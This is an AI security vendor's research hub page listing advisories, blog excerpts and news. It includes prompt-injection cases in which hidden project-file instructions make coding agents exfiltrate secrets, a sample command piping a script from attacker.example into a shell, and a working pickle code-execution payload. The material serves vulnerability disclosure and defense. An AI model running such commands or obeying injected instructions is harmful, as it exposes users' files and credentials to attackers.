Innovation Hub

Featured Posts

Insights

Introducing Workflow-Aligned Modules in the HiddenLayer AI Security Platform

Insights

Inside HiddenLayer’s Research Team: The Experts Securing the Future of AI

Insights

Why Traditional Cybersecurity Won’t “Fix” AI

Get all our Latest Research & Insights

Explore our glossary to get clear, practical definitions of the terms shaping AI security, governance, and risk management.

Research

Research

Agentic ShadowLogic

Research

MCP and the Shift to AI Systems

Research

The Lethal Trifecta and How to Defend Against It

Research

EchoGram: The Hidden Vulnerability Undermining AI Guardrails

Videos

Reports and Guides

Report and Guide

Securing AI: The Technology Playbook

Report and Guide

Securing AI: The Financial Services Playbook

Report and Guide

AI Threat Landscape Report 2025

HiddenLayer AI Security Research Advisories

CVE-2025-62354

Allowlist Bypass in Run Terminal Tool Allows Arbitrary Code Execution During Autorun Mode

When autorun mode is used with the secure ‘Follow Allowlist’ setting, Cursor checks each command the agent sends to the terminal to see whether it has been specifically allowed. The function that performs this check has a bypass in its logic, allowing an attacker to craft a command that executes non-allowlisted commands.
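
For context, here is a minimal sketch of this failure class in general. It is not Cursor’s actual code, and the allowlist contents and check are assumptions: a check that inspects only the first token of a command never sees shell operators that chain additional, non-allowlisted commands.

```python
# Illustrative only: a naive first-token allowlist check, not Cursor's implementation.
ALLOWLIST = {"ls", "git", "npm"}  # hypothetical allowed commands

def naive_is_allowed(command: str) -> bool:
    # Only the first whitespace-separated token is checked,
    # so shell operators after it are never inspected.
    return command.split()[0] in ALLOWLIST

# Passes the check, yet a shell would also run the non-allowlisted curl pipeline.
print(naive_is_allowed("git status; curl https://attacker.example/x.sh | sh"))  # True
```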

SAI-ADV-2025-012

Data Exfiltration from Tool-Assisted Setup

Windsurf’s automated tools can execute instructions contained within project files without asking for user permission. An attacker can therefore hide instructions in a project file that read sensitive data (such as a .env file) and insert it into web requests for exfiltration.

CVE-2025-62353

Path Traversal in File Tools Allowing Arbitrary Filesystem Access

A path traversal vulnerability exists within Windsurf’s codebase_search and write_to_file tools. These tools do not properly validate input paths, enabling access to files outside the intended project directory, which can provide attackers a way to read from and write to arbitrary locations on the target user’s filesystem.
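
As a rough illustration of the missing validation (a sketch under assumed names, not Windsurf’s implementation), a containment check resolves every requested path against the project root before any read or write:

```python
# Illustrative containment check; function and variable names are assumptions.
from pathlib import Path

def resolve_in_project(project_root: str, requested: str) -> Path:
    root = Path(project_root).resolve()
    target = (root / requested).resolve()  # collapses "../" sequences
    if not target.is_relative_to(root):    # Python 3.9+
        raise ValueError(f"path escapes project root: {requested}")
    return target

# A request like "../../etc/passwd" is rejected instead of reaching the host filesystem.
```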

CVE-2025-62356

Symlink Bypass in File System MCP Server Leading to Arbitrary Filesystem Read

A symlink bypass vulnerability exists in the built-in File System MCP server, allowing any file on the filesystem to be read by the model. The code that validates allowed paths lives in ai/codium/mcp/ideTools/FileSystem.java, but the validation can be bypassed if a symbolic link exists within the project.
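
To illustrate the bug class (a sketch, not the logic in FileSystem.java), a purely lexical prefix check accepts a path whose final component is a symlink pointing outside the project, while resolving the real path first catches it:

```python
# Illustrative comparison of lexical vs. symlink-aware path checks.
import os

def lexical_check(allowed_root: str, candidate: str) -> bool:
    # Passes whenever the path *string* sits under the allowed root,
    # even if the final component is a symlink to /etc/passwd.
    return os.path.abspath(candidate).startswith(os.path.abspath(allowed_root) + os.sep)

def symlink_aware_check(allowed_root: str, candidate: str) -> bool:
    # realpath() follows symlinks, so a link escaping the project is detected.
    real = os.path.realpath(candidate)
    return real.startswith(os.path.realpath(allowed_root) + os.sep)
```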

In the News

News
HiddenLayer Selected as Awardee on $151B Missile Defense Agency SHIELD IDIQ Supporting the Golden Dome Initiative

Underpinning HiddenLayer’s solution for the DoD and US Intelligence Community is its Airgapped AI Security Platform, the first offering designed to protect AI models and development processes in fully classified, disconnected environments. Deployed locally within customer-controlled environments, the platform supports strict US Federal security requirements while delivering enterprise-ready detection, scanning, and response capabilities essential for national security missions.

News
HiddenLayer Announces AWS GenAI Integrations, AI Attack Simulation Launch, and Platform Enhancements to Secure Bedrock and AgentCore Deployments

As organizations rapidly adopt generative AI, they face increasing risks of prompt injection, data leakage, and model misuse. HiddenLayer’s security technology, built on AWS, helps enterprises address these risks while maintaining speed and innovation.

News
HiddenLayer Joins Databricks’ Data Intelligence Platform for Cybersecurity

On September 30, Databricks officially launched its Data Intelligence Platform for Cybersecurity (https://www.databricks.com/blog/transforming-cybersecurity-data-intelligence), marking a significant step in unifying data, AI, and security under one roof. At HiddenLayer, we’re proud to be part of this new data intelligence platform, as it represents a significant milestone in the industry's direction.

Insights

AI Security: 2025 Predictions & Recommendations

It’s time to dust off the crystal ball once again! Over the past year, AI has truly been at the forefront of cyber security, with increased scrutiny from attackers, defenders, developers, and academia. As various forms of generative AI drive mass AI adoption, we find that the threats are not lagging far behind, with LLMs, RAGs, Agentic AI, integrations, and plugins being a hot topic for researchers and miscreants alike.

Insights

Securely Introducing Open Source Models into Your Organization

Open source models are powerful tools for data scientists, but they also come with risks. If your team downloads models from sources like Hugging Face without security checks, you could introduce security threats into your organization. You can mitigate this risk by introducing a process that scans models for vulnerabilities before they enter your organization and are used by data scientists. By pairing HiddenLayer's Model Scanner with your CI/CD platform, you can ensure that only safe models are used. In this blog, we'll walk you through how to set up a system where data scientists request models, security checks run automatically, and approved models are stored in a safe location such as cloud storage, a model registry, or Databricks Unity Catalog.
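
As a rough sketch of that request, scan, and promote flow: the scan and promote callables below are hypothetical placeholders for the scanner and storage integrations, not the Model Scanner API. The gate simply refuses to publish any artifact that fails its scan.

```python
# Sketch of a scan-before-promote gate; the scanner and storage calls are
# hypothetical placeholders, not HiddenLayer Model Scanner APIs.
from pathlib import Path
from typing import Callable

def handle_model_request(
    artifact: Path,
    scan: Callable[[Path], bool],          # plug in your model scanner here
    promote: Callable[[Path, str], None],  # plug in cloud storage / registry upload here
    destination: str,
) -> str:
    # Only artifacts that pass the security scan ever reach trusted storage.
    if not scan(artifact):
        return f"rejected: {artifact.name} failed the security scan"
    promote(artifact, destination)
    return f"approved: {artifact.name} promoted to {destination}"

# Example wiring with dummy callables:
if __name__ == "__main__":
    print(handle_model_request(Path("model.bin"), scan=lambda p: False,
                               promote=lambda p, d: None, destination="s3://approved-models"))
```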

Insights

Enhancing AI Security with HiddenLayer’s Refusal Detection

Security risks in AI applications are not one-size-fits-all. A system processing sensitive customer data presents vastly different security challenges compared to one that aggregates internet data for market analysis. To effectively safeguard an AI application, developers and security professionals must implement comprehensive mechanisms that instruct models to decline contextually malicious requests—such as revealing personally identifiable information (PII) or ingesting data from untrusted sources. Monitoring these refusals provides an early and high-accuracy warning system for potential malicious behavior.
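
As a simplified illustration of the idea, using a naive keyword heuristic rather than HiddenLayer's actual Refusal Detection, counting refusal-style responses per session gives an early signal worth alerting on:

```python
# Naive illustration of refusal monitoring as a security signal.
REFUSAL_MARKERS = ("i can't help with", "i cannot assist", "this request is not allowed")

def looks_like_refusal(model_output: str) -> bool:
    text = model_output.lower()
    return any(marker in text for marker in REFUSAL_MARKERS)

def should_alert(recent_outputs: list[str], threshold: int = 3) -> bool:
    # A burst of refusals from one session often indicates probing or misuse.
    return sum(looks_like_refusal(o) for o in recent_outputs) >= threshold
```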

Insights

Why Revoking Biden’s AI Executive Order Won’t Change Course for CISOs

On January 20, 2025, President Donald Trump rescinded former President Joe Biden’s 2023 executive order on artificial intelligence (AI), which had established comprehensive guidelines for developing and deploying AI technologies. While this action signals a shift in federal policy, its immediate impact on the AI landscape is minimal for several reasons.

Insights

HiddenLayer Achieves ISO 27001 and Renews SOC 2 Type 2 Compliance

Security compliance is more than just a checkbox - it’s a fundamental requirement for protecting sensitive data, building customer trust, and ensuring long-term business growth. At HiddenLayer, security has always been at the core of our mission, and we’re proud to announce that we have achieved SOC 2 Type 2 and ISO 27001 compliance. These certifications reinforce our commitment to providing our customers with the highest level of security and reliability.

Insights

AI Risk Management: Effective Strategies and Framework

Artificial Intelligence (AI) is no longer just a buzzword—it’s a cornerstone of innovation across industries. However, with great potential comes significant risk. Effective AI Risk Management is critical to harnessing AI’s benefits while minimizing vulnerabilities. From data breaches to adversarial attacks, understanding and mitigating risks ensures that AI systems remain trustworthy, secure, and aligned with organizational goals.

Insights

Security for AI vs. AI Security

When we talk about securing AI, it’s important to distinguish between two concepts that are often conflated: Security for AI and AI Security. While they may sound similar, they address two entirely different challenges.

Insights

The Next Step in AI Red Teaming: Automation

Red teaming is essential in security, actively probing defenses, identifying weaknesses, and assessing system resilience under simulated attacks. For organizations that manage critical infrastructure, every vulnerability poses a risk to data, services, and trust. As systems grow more complex and threats become more sophisticated, traditional red teaming encounters limits, particularly around scale and speed. To address these challenges, we built the next step in red teaming: an Automated Red Teaming for AI solution (https://hiddenlayer.com/autortai/) that combines intelligence and efficiency to achieve a level of depth and scalability beyond what human-led efforts alone can offer.

Insights

Understanding AI Data Poisoning

Today, AI is woven into everyday technology, driving everything from personalized recommendations to critical healthcare diagnostics. But what happens if the data feeding these AI models is tampered with? This is the risk posed by AI data poisoning—a targeted attack where someone intentionally manipulates training data to disrupt how AI systems operate. Far from science fiction, AI data poisoning is a growing digital security threat that can have real-world impacts on everything from personal safety to financial stability.

Insights

The EU AI Act: A Groundbreaking Framework for AI Regulation

Artificial intelligence (AI) has become a central part of our digital society, influencing everything from healthcare to transportation, finance, and beyond. The European Union (EU) has recognized the need to regulate AI technologies to protect citizens, foster innovation, and ensure that AI systems align with European values of privacy, safety, and accountability. In this context, the EU AI Act is the world’s first comprehensive legal framework for AI. The legislation aims to create an ecosystem of trust in AI while balancing the risks and opportunities associated with its development.

Insights

Key Takeaways from NIST's Recent Guidance

On July 29th, 2024, the National Institute of Standards and Technology (NIST) released critical guidance that outlines best practices for managing cybersecurity risks associated with AI models. This guidance directly ties into several comments we submitted during the open comment periods, highlighting areas where HiddenLayer effectively addresses emerging cybersecurity challenges.

Insights

Three Distinct Categories Of AI Red Teaming

As we’ve covered previously, AI red teaming is a highly effective means of assessing and improving the security of AI systems. The term “red teaming” appears many times throughout recent public policy briefings regarding AI.

Research

Agentic ShadowLogic

Research

MCP and the Shift to AI Systems

Research

The Lethal Trifecta and How to Defend Against It

Research

EchoGram: The Hidden Vulnerability Undermining AI Guardrails

Research

Same Model, Different Hat

Research

The Expanding AI Cyber Risk Landscape

Research

The First AI-Powered Cyber Attack

Research

Prompts Gone Viral: Practical Code Assistant AI Viruses

Research

Persistent Backdoors

Research

Visual Input based Steering for Output Redirection (VISOR)

Research

How Hidden Prompt Injections Can Hijack AI Code Assistants Like Cursor

Research

Introducing a Taxonomy of Adversarial Prompt Engineering

Report and Guide

Securing AI: The Technology Playbook

Report and Guide

Securing AI: The Financial Services Playbook

Report and Guide

AI Threat Landscape Report 2025

Report and Guide

HiddenLayer Named a Cool Vendor in AI Security

Report and Guide

A Step-By-Step Guide for CISOs

Report and Guide

AI Threat Landscape Report 2024

Report and Guide

HiddenLayer and Intel eBook

Report and Guide

Forrester Opportunity Snapshot

News

HiddenLayer Selected as Awardee on $151B Missile Defense Agency SHIELD IDIQ Supporting the Golden Dome Initiative

News

HiddenLayer Announces AWS GenAI Integrations, AI Attack Simulation Launch, and Platform Enhancements to Secure Bedrock and AgentCore Deployments

News

HiddenLayer Joins Databricks’ Data Intelligence Platform for Cybersecurity

News

HiddenLayer Appoints Chelsea Strong as Chief Revenue Officer to Accelerate Global Growth and Customer Expansion

News

HiddenLayer Listed in AWS “ICMP” for the US Federal Government

News

New TokenBreak Attack Bypasses AI Moderation with Single-Character Text Changes

News

Beating the AI Game, Ripple, Numerology, Darcula, Special Guests from Hidden Layer… – Malcolm Harkins, Kasimir Schulz – SWN #471

News

All Major Gen-AI Models Vulnerable to ‘Policy Puppetry’ Prompt Injection Attack

News

One Prompt Can Bypass Every Major LLM’s Safeguards

News

Cyera and HiddenLayer Announce Strategic Partnership to Deliver End-to-End AI Security

News

HiddenLayer Unveils AISec Platform 2.0 to Deliver Unmatched Context, Visibility, and Observability for Enterprise AI Security

News

HiddenLayer AI Threat Landscape Report Reveals AI Breaches on the Rise;

SAI Security Advisory

Allowlist Bypass in Run Terminal Tool Allows Arbitrary Code Execution During Autorun Mode

When autorun mode is used with the secure ‘Follow Allowlist’ setting, Cursor checks each command the agent sends to the terminal to see whether it has been specifically allowed. The function that performs this check has a bypass in its logic, allowing an attacker to craft a command that executes non-allowlisted commands.

SAI Security Advisory

Data Exfiltration from Tool-Assisted Setup

Windsurf’s automated tools can execute instructions contained within project files without asking for user permission. An attacker can therefore hide instructions in a project file that read sensitive data (such as a .env file) and insert it into web requests for exfiltration.

SAI Security Advisory

Path Traversal in File Tools Allowing Arbitrary Filesystem Access

A path traversal vulnerability exists within Windsurf’s codebase_search and write_to_file tools. These tools do not properly validate input paths, enabling access to files outside the intended project directory, which can provide attackers a way to read from and write to arbitrary locations on the target user’s filesystem.

SAI Security Advisory

Symlink Bypass in File System MCP Server Leading to Arbitrary Filesystem Read

A symlink bypass vulnerability exists in the built-in File System MCP server, allowing any file on the filesystem to be read by the model. The code that validates allowed paths lives in ai/codium/mcp/ideTools/FileSystem.java, but the validation can be bypassed if a symbolic link exists within the project.

SAI Security Advisory

Data Exfiltration through Web Search Tool

The Web Search functionality within the Qodo Gen JetBrains plugin is set up as a built-in MCP server through ai/codium/CustomAgentKt.java. It does not ask for user permission when called, meaning that an attacker can enumerate code project files on a victim’s machine and call the Web Search tool to exfiltrate their contents via a request to an external server.

SAI Security Advisory

Unsafe deserialization function leads to code execution when loading a Keras model

An arbitrary code execution vulnerability exists in the TorchModuleWrapper class due to its usage of torch.load() within the from_config method. The method deserializes model data with the weights_only parameter set to False, which causes Torch to fall back on Python’s pickle module for deserialization. Since pickle is known to be unsafe and capable of executing arbitrary code during the deserialization process, a maliciously crafted model file could allow an attacker to execute arbitrary commands.
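
To make the underlying mechanism concrete, here is a self-contained sketch of pickle's behavior (not the Keras or Torch code itself): deserializing attacker-controlled bytes runs whatever callable the payload's __reduce__ returns.

```python
# Demonstration of why pickle-based deserialization of untrusted files is unsafe.
import os
import pickle

class MaliciousPayload:
    def __reduce__(self):
        # On unpickling, pickle calls os.system("echo pwned"), a harmless stand-in
        # for arbitrary attacker code embedded in a crafted model file.
        return (os.system, ("echo pwned",))

blob = pickle.dumps(MaliciousPayload())
pickle.loads(blob)  # prints "pwned": code ran purely by deserializing the bytes
```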

SAI Security Advisory

How Hidden Prompt Injections Can Hijack AI Code Assistants Like Cursor

When in autorun mode, Cursor checks commands against those that have been specifically blocked or allowed. The function that performs this check has a bypass in its logic that an attacker can exploit to craft a command that will be executed regardless of whether it is on the blocklist or allowlist.

SAI Security Advisory

Exposure of sensitive information allows account takeover

By default, BackendAI’s agent writes files to /home/config/ when starting an interactive session. These files are readable by the default user, yet they contain sensitive information such as the user’s email, access key, and session settings. A threat actor who accesses these files can perform operations on behalf of the user, potentially gaining super administrator privileges.

SAI Security Advisory

Improper access control allows arbitrary account creation

By default, BackendAI doesn’t enable account creation. However, an exposed endpoint allows anyone to sign up for a user-privileged account. This flaw lets threat actors start their own unauthorized sessions and exploit the resources (for example, to install cryptominers or use the session as a malware distribution endpoint), or to access exposed data through user-accessible storage.

SAI Security Advisory

Missing Authorization for Interactive Sessions

BackendAI interactive sessions do not verify whether a user is authorized and do not require authentication. These missing checks allow attackers to take over sessions and access the data (models, code, etc.), alter the data or results, and prevent the user from accessing their session.

SAI Security Advisory

Unsafe Deserialization in DeepSpeed utility function when loading the model file

The convert_zero_checkpoint_to_fp32_state_dict utility function contains an unsafe torch.load which will execute arbitrary code on a user’s system when loading a maliciously crafted file.

SAI Security Advisory

keras.models.load_model when scanning .pb files leads to arbitrary code execution

A vulnerability exists in the unsafe_check_pb function within the watchtower/src/utils/model_inspector_util.py file. This function runs keras.models.load_model on a .pb file that the user wants to scan for malicious payloads. A maliciously crafted .pb file will execute its payload when loaded with keras.models.load_model, allowing a user’s device to be compromised when scanning a downloaded file.
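
As a hedged sketch of the safer direction (illustrative heuristics only, not Watchtower's actual fix), a scanner can inspect the raw bytes of a downloaded model without ever calling keras.models.load_model, which is the step that executes an embedded payload:

```python
# Illustrative only: scan file bytes statically instead of loading the model.
from pathlib import Path

# Naive markers of embedded executable content; a real scanner would parse the format.
SUSPICIOUS_MARKERS = (b"os.system", b"subprocess", b"__import__", b"marshal")

def static_scan(model_path: str) -> list[bytes]:
    """Return any suspicious markers found in the raw file, without deserializing it."""
    blob = Path(model_path).read_bytes()
    return [marker for marker in SUSPICIOUS_MARKERS if marker in blob]

# Unlike keras.models.load_model(model_path), this never executes embedded code.
```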

Stay Ahead of AI Security Risks

Get research-driven insights, emerging threat analysis, and practical guidance on securing AI systems—delivered to your inbox.

By submitting this form, you agree to HiddenLayer's Terms of Use and acknowledge our Privacy Statement.
